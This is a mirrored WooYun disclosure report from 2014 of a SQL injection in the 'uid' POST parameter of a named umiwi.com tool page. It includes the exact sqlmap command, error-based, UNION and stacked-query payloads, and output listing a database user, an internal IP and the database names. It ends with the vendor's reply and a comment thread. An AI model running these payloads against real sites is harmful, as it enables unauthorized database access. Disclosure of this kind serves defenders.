优米网SQL注入漏洞之3

admin 2015年5月31日11:54:11评论257 views字数 193阅读0分38秒阅读模式
摘要

2014-08-26: 细节已通知厂商并且等待厂商处理中
2014-08-26: 厂商已经确认,细节仅向厂商公开
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-10: 细节向公众公开

漏洞概要 关注数(21) 关注此漏洞

缺陷编号: WooYun-2014-73885

漏洞标题: 优米网SQL注入漏洞之3

相关厂商: 优米网

漏洞作者: 猪猪侠优米网SQL注入漏洞之3

提交时间: 2014-08-26 12:59

公开时间: 2014-10-10 13:00

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

4人收藏


漏洞详情

披露状态:

2014-08-26: 细节已通知厂商并且等待厂商处理中
2014-08-26: 厂商已经确认,细节仅向厂商公开
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-10: 细节向公众公开

简要描述:

优米网SQL注入漏洞#3
一个厂商漏洞不发超过三个,再见!

详细说明:

http://star.umiwi.com/tools/result.php

uid=1121&projectid=&productid=&starttime=&endtime=&func=starinfo

POST,注入参数uid

漏洞证明:

code 区域
sqlmap -u "http://star.umiwi.com/tools/result.php" --data="uid=1121&projectid=&productid=&starttime=&endtime=&func=starinfo" --dbs

Place: POST
Parameter: uid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=1121' AND (SELECT 6976 FROM(SELECT COUNT(*),CONCAT(0x3a7a65763a,(SELECT (CASE WHEN (6976=6976) THEN 1 ELSE 0 END)),0x3a77776a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zazu'='zazu&projectid=&productid=&starttime=&endtime=&func=starinfo

Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: uid=1121' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x3a7a65763a,0x687a7165447a46584d45,0x3a77776a3a),NULL,NULL#&projectid=&productid=&starttime=&endtime=&func=starinfo

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: uid=1121'; SELECT SLEEP(5)-- &projectid=&productid=&starttime=&endtime=&func=starinfo
---
[00:19:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[00:19:43] [INFO] fetching database users
database management system users [1]:
[*] 'star_online'@'192.168.19.167'

[00:19:43] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] star_online

[00:19:43] [INFO] fetched data logged to text files under './output/star.umiwi.com'

修复方案:

参数过滤

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-08-26 14:16

厂商回复:

已经停止运营的未经保护的内部站点

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-08-26 13:06 | roker ( 普通白帽子 | Rank:372 漏洞数:109 )

    2

    第一次前排

  2. 2014-08-26 13:08 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    0

    第二次前排

  3. 2014-08-26 13:09 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    2

    第三个前排

  4. 2014-08-26 13:27 | 玉林嘎 优米网SQL注入漏洞之3 ( 普通白帽子 | Rank:941 漏洞数:108 )

    0

    第四次前排

  5. 2014-08-26 13:40 | PythonPig ( 普通白帽子 | Rank:562 漏洞数:84 | 只会简单工具的小小菜)

    1

    第五次前排

  6. 2014-08-26 14:22 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    0

    第六次前排

  7. 2014-08-26 15:02 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    猪哥,你腾讯、搜狐、ucloud等很多厂商,都不止3个哈

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin